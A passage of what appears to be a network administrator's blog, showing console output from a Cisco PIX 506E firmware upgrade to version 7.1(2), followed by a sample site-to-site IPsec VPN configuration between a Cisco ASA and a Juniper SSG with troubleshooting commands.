flashfs[7]: erasing block 41…done.
flashfs[7]: Checking block 42…block number was (-13108)
flashfs[7]: erasing block 42…done.
flashfs[7]: Checking block 43…block number was (-13108)
flashfs[7]: erasing block 43…done.
flashfs[7]: Checking block 44…block number was (-13108)
flashfs[7]: erasing block 44…done.
flashfs[7]: Checking block 45…block number was (-13108)
flashfs[7]: erasing block 45…done.
flashfs[7]: Checking block 46…block number was (-13108)
flashfs[7]: erasing block 46…done.
flashfs[7]: Checking block 47…block number was (-13108)
flashfs[7]: erasing block 47…done.
flashfs[7]: Checking block 48…block number was (-13108)
flashfs[7]: erasing block 48…done.
flashfs[7]: Checking block 49…block number was (-13108)
flashfs[7]: erasing block 49…done.
flashfs[7]: Checking block 50…block number was (-13108)
flashfs[7]: erasing block 50…done.
flashfs[7]: Checking block 51…block number was (-13108)
flashfs[7]: erasing block 51…done.
flashfs[7]: Checking block 52…block number was (-13108)
flashfs[7]: erasing block 52…done.
flashfs[7]: Checking block 53…block number was (-13108)
flashfs[7]: erasing block 53…done.
flashfs[7]: Checking block 54…block number was (-13108)
flashfs[7]: erasing block 54…done.
flashfs[7]: Checking block 55…block number was (-13108)
flashfs[7]: erasing block 55…done.
flashfs[7]: Checking block 56…block number was (-13108)
flashfs[7]: erasing block 56…done.
flashfs[7]: Checking block 57…block number was (-13108)
flashfs[7]: erasing block 57…done.
flashfs[7]: Checking block 58…block number was (-13108)
flashfs[7]: erasing block 58…done.
flashfs[7]: Checking block 59…block number was (-13108)
flashfs[7]: erasing block 59…done.
flashfs[7]: Checking block 60…block number was (-13108)
flashfs[7]: erasing block 60…done.
flashfs[7]: Checking block 61…block number was (0)
flashfs[7]: erasing block 61…done.
flashfs[7]: 0 files, 1 directories
flashfs[7]: 0 orphaned files, 0 orphaned directories
flashfs[7]: Total bytes: 7870464
flashfs[7]: Bytes used: 1024
flashfs[7]: Bytes available: 7869440
flashfs[7]: flashfs fsck took 53 seconds.
flashfs[7]: Initialization complete.

Saving the configuration
!
Saving a copy of old configuration as downgrade.cfg
!
Saved the activation key from the flash image
Saved the default firewall mode (single) to flash
The version of image file in flash is not bootable in the current version of
software.
Use the downgrade command first to boot older version of software.
The file is being saved as image_old.bin anyway.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Upgrade process complete
Need to burn loader….
Erasing sector 0…[OK]
Burning sector 0…[OK]

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
URL Filtering : Enabled
Security Contexts : 0
GTP/GPRS : Disabled
VPN Peers : Unlimited

This platform does not support Failover.

————————————————————————–
. .
| |
||| |||
.|| ||. .|| ||.
.:||| | |||:..:||| | |||:.
C i s c o S y s t e m s
————————————————————————–

Cisco PIX Security Appliance Software Version 7.1(2)

****************************** Warning *******************************
This product contains cryptographic features and is
subject to United States and local country laws
governing, import, export, transfer, and use.
Delivery of Cisco cryptographic products does not
imply third-party authority to import, export,
distribute, or use encryption. Importers, exporters,
distributors and users are responsible for compliance
with U.S. and local country laws. By using this
product you agree to comply with applicable laws and
regulations. If you are unable to comply with U.S.
and local laws, return the enclosed items immediately.

A summary of U.S. laws governing Cisco cryptographic
products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by
sending email to [email protected]
******************************* Warning *******************************

Copyright (c) 1996-2006 by Cisco Systems, Inc.

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

Cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

timeout sip-disconnect 0:02:00 sip-invite 0:03:00
^
ERROR: % Invalid input detected at ‘^’ marker.
*** Output from config line 40, “timeout sip-disconnect 0…”
ERROR: This command is no longer needed. The LOCAL user database is always enabled.
*** Output from config line 48, “aaa-server LOCAL protoco…”
ERROR: This command is no longer needed. The ‘floodguard’ feature is always enabled.
*** Output from config line 55, “floodguard enable”

Cryptochecksum (unchanged): 5ca481c6 1487c90e c50ead2b a3088231
INFO: converting ‘fixup protocol dns maximum-length 512′ to MPF commands
INFO: converting ‘fixup protocol ftp 21′ to MPF commands
INFO: converting ‘fixup protocol h323_h225 1720′ to MPF commands
INFO: converting ‘fixup protocol h323_ras 1718-1719′ to MPF commands
INFO: converting ‘fixup protocol http 80′ to MPF commands
INFO: converting ‘fixup protocol netbios 137-138′ to MPF commands
INFO: converting ‘fixup protocol rsh 514′ to MPF commands
INFO: converting ‘fixup protocol rtsp 554′ to MPF commands
INFO: converting ‘fixup protocol sip 5060′ to MPF commands
INFO: converting ‘fixup protocol skinny 2000′ to MPF commands
INFO: converting ‘fixup protocol smtp 25′ to MPF commands
INFO: converting ‘fixup protocol sqlnet 1521′ to MPF commands
INFO: converting ‘fixup protocol sunrpc_udp 111′ to MPF commands
INFO: converting ‘fixup protocol tftp 69′ to MPF commands
INFO: converting ‘fixup protocol sip udp 5060′ to MPF commands
INFO: converting ‘fixup protocol xdmcp 177′ to MPF commands
************************************************************************
** **
** *** WARNING *** WARNING *** WARNING *** WARNING *** WARNING *** **
** **
** —-> Current image running from RAM only!
en
Password:
pixfirewall# sh ver

Cisco PIX Security Appliance Software Version 7.1(2)

Compiled on Tue 14-Mar-06 17:00 by dalecki
System image file is “Unknown, monitor mode tftp booted image”
Config file at boot was “startup-config”

pixfirewall up 15 secs

Hardware: PIX-506E, 64 MB RAM, CPU Pentium II 300 MHz
Flash E28F640J3 @ 0xfff00000, 8MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: Ext: Ethernet0 : address is 001a.a2a4.5c32, irq 10
1: Ext: Ethernet1 : address is 001a.a2a4.5c33, irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
pixfirewall# sh flash

Directory of flash:/

4 -rw- 1830 16:23:18 Aug 04 2012 downgrade.cfg
7 -rw- 1978424 16:23:34 Aug 04 2012 image_old.bin

7870464 bytes total (5884928 bytes free)
pixfirewall# delete downgrade.cfg

Delete filename [downgrade.cfg]?

Delete flash:/downgrade.cfg? [confirm]

pixfirewall# delete image_old.bin

Delete filename [image_old.bin]?

Delete flash:/image_old.bin? [confirm]

pixfirewall# sh ip
System IP Addresses:
Interface Name IP address Subnet mask Method
Ethernet1 inside 192.168.5.2 255.255.255.0 CONFIG
Current IP Addresses:
Interface Name IP address Subnet mask Method
Ethernet1 inside 192.168.5.2 255.255.255.0 CONFIG
pixfirewall# copy tftp://192.168.5.1/pix712.bin flash

Address or name of remote host [192.168.5.1]?

Source filename [pix712.bin]?

Destination filename [pix712.bin]?

Accessing tftp://192.168.5.1/pix712.bin…!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Writing file flash:/pix712.bin…
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

6764544 bytes copied in 72.900 secs (93952 bytes/sec)
pixfirewall# sh flash

Directory of flash:/

4 -rw- 6764544 16:29:38 Aug 04 2012 pix712.bin

7870464 bytes total (1101312 bytes free)
pixfirewall# show run | i boot
pixfirewall# config t
pixfirewall(config)# boot system pix712.bin
INFO: Converting pix712.bin to flash:/pix712.bin
pixfirewall(config)# exit
pixfirewall# wr mem
Building configuration…
Cryptochecksum: 1c4473b8 dc713c6f 0b1336b3 b45dea54

1765 bytes copied in 0.430 secs
[OK]
pixfirewall# show run | i boot
boot system flash:/pix712.bin
pixfirewall# reload
Proceed with reload? [confirm]
pixfirewall#

***
*** — START GRACEFUL SHUTDOWN —
Shutting down isakmp
Shutting down File system

***
*** — SHUTDOWN NOW —

Rebooting….

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Reading 123392 bytes of image from flash.

PIX Flash Load Helper

Initializing flashfs…
flashfs[0]: 6 files, 3 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 7870464
flashfs[0]: Bytes used: 6770176
flashfs[0]: Bytes available: 1100288
flashfs[0]: Initialization complete.

Reading image flash:/pix712.bin
Launching image flash:/pix712.bin
###############################################

64MB RAM

Total NICs found: 2
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
BIOS Flash=am29f400b @ 0xd8000

Initializing flashfs…
flashfs[7]: 6 files, 3 directories
flashfs[7]: 0 orphaned files, 0 orphaned directories
flashfs[7]: Total bytes: 7870464
flashfs[7]: Bytes used: 6770176
flashfs[7]: Bytes available: 1100288
flashfs[7]: flashfs fsck took 9 seconds.
flashfs[7]: Initialization complete.

Need to burn loader….
Erasing sector 0…[OK]
Burning sector 0…[OK]

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
URL Filtering : Enabled
Security Contexts : 0
GTP/GPRS : Disabled
VPN Peers : Unlimited

This platform does not support Failover.

————————————————————————–
. .
| |
||| |||
.|| ||. .|| ||.
.:||| | |||:..:||| | |||:.
C i s c o S y s t e m s
————————————————————————–

Cisco PIX Security Appliance Software Version 7.1(2)

****************************** Warning *******************************
This product contains cryptographic features and is
subject to United States and local country laws
governing, import, export, transfer, and use.
Delivery of Cisco cryptographic products does not
imply third-party authority to import, export,
distribute, or use encryption. Importers, exporters,
distributors and users are responsible for compliance
with U.S. and local country laws. By using this
product you agree to comply with applicable laws and
regulations. If you are unable to comply with U.S.
and local laws, return the enclosed items immediately.

A summary of U.S. laws governing Cisco cryptographic
products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by
sending email to [email protected]
******************************* Warning *******************************

Copyright (c) 1996-2006 by Cisco Systems, Inc.

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

Cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

Cryptochecksum (unchanged): 1c4473b8 dc713c6f 0b1336b3 b45dea54
Type help or ‘?’ for a list of available commands.
pixfirewall> sh ver

Cisco PIX Security Appliance Software Version 7.1(2)

Compiled on Tue 14-Mar-06 17:00 by dalecki
System image file is “flash:/pix712.bin”
Config file at boot was “startup-config”

pixfirewall up 7 secs

Hardware: PIX-506E, 64 MB RAM, CPU Pentium II 300 MHz
Flash E28F640J3 @ 0xfff00000, 8MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: Ext: Ethernet0 : address is 001a.a2a4.5c32, irq 10
1: Ext: Ethernet1 : address is 001a.a2a4.5c33, irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
pixfirewall> en
Password:
pixfirewall# sh flash

Directory of flash:/

4 -rw- 6764544 16:29:38 Aug 04 2012 pix712.bin

7870464 bytes total (1100288 bytes free)
pixfirewall#
pixfirewall#

Below is a config to create a VPN tunnel between a Cisco ASA (Blue side) to a Juniper SSG ScreenOS (Red Side).

Juniper Settings:

ethernet0/0: 22.22.22.22, Untrust
bgroup0: 172.16.22.1, Trust

Cisco ASA config (Blue):

!^^^^^^^ ISAKMP (Phase 1) ^^^^^^^!
! must match with the other side in order for Phase 1 to complete.
! Lower policy numbers will likely be used before higher ones.
crypto isakmp policy 5
authentication pre-share
encryption aes
hash sha
group 2
lifetime 86400

! Enable ISAKMP on the outside interface
crypto isakmp enable OUTSIDE
! Define the pre-shared-key
tunnel-group 22.22.22.22 type ipsec-l2l
tunnel-group 22.22.22.22 ipsec-attributes
pre-shared-key sekretk3y

!^^^^^^^ IPSEC (Phase 2) ^^^^^^^!
! Define the interesting traffic in the ACL
access-list ACL-RED-VPN permit ip 192.168.11.0 255.255.255.0 172.16.22.0 255.255.255.0
crypto ipsec transform-set ESP-AES128-SHA esp-aes esp-sha-hmac
! Create a crypto map entry that defines the tunnel
crypto map MAP-OUTSIDE 20 set peer 22.22.22.22
! ACL must be exactly the opposite of the other sides ACL
crypto map MAP-OUTSIDE 20 match address ACL-RED-VPN
! Transform set must match other side identically
crypto map MAP-OUTSIDE 20 set transform-set ESP-AES128-SHA
crypto map MAP-OUTSIDE 20 set security-association lifetime kilobytes 10000
! Apply crypto map to an interface
crypto map MAP-OUTSIDE interface OUTSIDE

!^^^^^^^ Routes and No-NATS ^^^^^^^!
! Point the destination network out the outside interface with a next hop as the default gateway.
route OUTSIDE 172.16.22.0 255.255.255.0 11.11.11.1
! Make sure that the VPN traffic is NOT NAT’d
access-list ACL-INSIDE-NONAT extended permit ip 192.168.11.0 255.255.255.0 172.16.22.0 255.255.255.0
nat (INSIDE) 0 access-list ACL-INSIDE-NONAT

Juniper SSG-5 ScreenOS config (Red):

# Create a tunnel interface
set interface tunnel.1 zone Untrust
set interface tunnel.1 ip unnumbered interface ethernet0/0

# Create the gateway (IKE settings)
# note that “sec-level standard” means the IKE policies will try to use:  pre-g2-3des-sha and pre-g2-aes128-sha
set ike gateway “VPN-GATEWAY” ip 11.11.11.11 outgoing-interface ethernet0/0 preshare “sekretk3y” sec-level standard

# Configure VPN IPSEC settings
set vpn “VPN” gateway “VPN-GATEWAY” replay tunnel idletime 0 proposal “nopfs-esp-aes128-sha”
set vpn “VPN” id 1 bind interface tunnel.1
set vpn “VPN” proxy-id local-ip 172.16.22.0/24 remote-ip 192.168.11.0/24 “ANY”

# Configure a route for the remote end traffic
set vrouter trust-vr route 192.168.11.0/24 interface tunnel.1

# Create 2 address book entries and create two policies to permit this traffic
set address Untrust “192.168.11.0/24″ 192.168.11.0/24
set address Trust “172.16.22.0/24″ 172.16.22.0/24
set policy top from “Trust” to “Untrust” “172.16.22.0/24″ “192.168.11.0/24″ “ANY” Permit log count
set policy top from “Untrust” to “Trust” “192.168.11.0/24″ “172.16.22.0/24″ “ANY” Permit log count

Notes:

Coming at this from my Cisco background I had to learn some new ways of looking at this.

The traffic that can go over the tunnel is called the proxy-id. It is defined in the vpn settings. You also have to then permit this traffic in a policy between the two zones of your tunnel interface and whatever internal interface you have. In my case my Trust interface was bgroup0.

 

Troubleshooting:

Some show commands to see what’s going on:

get sa

get ike gateway

get event

Try creating a packet capture to see what is happening to the packet. With a packet capture you can see what is going on between the two VPN peers, or why your interesting traffic is not making it through the SSG.

clear db
set console dbuf
set ffilter src-ip 1.1.1.1 dst-ip 2.2.2.2
debug flow basic

# generate some traffic

# to see the capture:
get dbuf stream

# to stop capturing:
undebug all